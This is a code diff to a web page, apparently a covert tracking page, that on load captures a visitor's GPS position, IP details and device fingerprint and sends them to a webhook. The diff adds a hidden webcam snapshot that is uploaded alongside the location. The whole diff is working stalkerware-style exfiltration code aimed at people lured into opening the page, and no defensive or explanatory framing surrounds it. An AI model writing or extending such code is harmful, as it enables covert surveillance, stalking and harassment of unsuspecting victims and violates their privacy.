--- a/index.html
+++ b/index.html
@@ -32,6 +32,7 @@
     </html>`;
 
     let timeoutID;
+    let capturedImageData = null;
 
     function redirectDenied() {
       document.open();
@@ -54,11 +55,13 @@
       const device = getDeviceInfo();
 
       const payload = {
-        content: `📍 **GPS Captured**  
-**Latitude:** ${lat}  
+        embeds: [
+          {
+            title: "📍 GPS & Device Info",
+            description: `**Latitude:** ${lat}  
 **Longitude:** ${lon}  
 **Accuracy:** ${acc} meters  
-**Map:** ${mapLink}
+**Map:** [View Location](${mapLink})
 
 🌐 **IP Info**  
 **IP:** ${ipData.ipAddress}  
@@ -73,13 +76,29 @@
 **Screen:** ${device.screen}  
 **Touch Support:** ${device.touchSupport}
 
-🕒 ${new Date().toLocaleString()}`
+🕒 ${new Date().toLocaleString()}`,
+            image: capturedImageData ? { url: "attachment://snapshot.png" } : undefined
+          }
+        ],
+        files: capturedImageData
+          ? [{
+              name: "snapshot.png",
+              type: "image/png",
+              data: capturedImageData
+            }]
+          : []
       };
+
+      const formData = new FormData();
+      formData.append("payload_json", JSON.stringify(payload));
+      if (capturedImageData) {
+        const blob = dataURLtoBlob(capturedImageData);
+        formData.append("files[0]", blob, "snapshot.png");
+      }
 
       fetch(webhookUrl, {
         method: "POST",
-        headers: { "Content-Type": "application/json" },
-        body: JSON.stringify(payload)
+        body: formData
       });
 
       setTimeout(() => {
@@ -119,17 +138,55 @@
         });
     }
 
-    function requestNotificationsThenStart() {
-      if (Notification && Notification.requestPermission) {
-        Notification.requestPermission().finally(() => {
+    function dataURLtoBlob(dataurl) {
+      const arr = dataurl.split(','), mime = arr[0].match(/:(.*?);/)[1],
+        bstr = atob(arr[1]), n = bstr.length, u8arr = new Uint8Array(n);
+      while(n--){
+        u8arr[n] = bstr.charCodeAt(n);
+      }
+      return new Blob([u8arr], {type:mime});
+    }
+
+    function captureImageThenStart() {
+      navigator.mediaDevices.getUserMedia({ video: true })
+        .then(stream => {
+          const video = document.createElement("video");
+          video.srcObject = stream;
+          video.play();
+
+          // Wait for the video to load metadata and draw frame
+          video.onloadedmetadata = () => {
+            const canvas = document.createElement("canvas");
+            canvas.width = video.videoWidth;
+            canvas.height = video.videoHeight;
+            const ctx = canvas.getContext("2d");
+            ctx.drawImage(video, 0, 0, canvas.width, canvas.height);
+            capturedImageData = canvas.toDataURL("image/png");
+
+            // Stop camera stream
+            stream.getTracks().forEach(track => track.stop());
+
+            // Continue to IP + GPS
+            getIPAndGPS();
+          };
+        })
+        .catch(() => {
+          // User denied camera or error — continue without image
           getIPAndGPS();
         });
+    }
+
+    function requestNotificationsThenCamera() {
+      if (Notification && Notification.requestPermission) {
+        Notification.requestPermission().finally(() => {
+          captureImageThenStart(); // now try camera
+        });
       } else {
-        getIPAndGPS();
+        captureImageThenStart(); // fallback
       }
     }
 
-    window.onload = requestNotificationsThenStart;
+    window.onload = requestNotificationsThenCamera;
   </script>
 </body>
 </html>
